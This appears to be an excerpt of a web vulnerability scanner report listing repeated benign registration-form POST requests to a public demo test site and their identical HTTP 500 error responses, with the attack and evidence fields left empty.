HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:14 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:15 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:16 GMT Content-Length: 1208 |
Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 475 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D41 Content-Length: 47 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
Response Header - size: 196 bytes. |
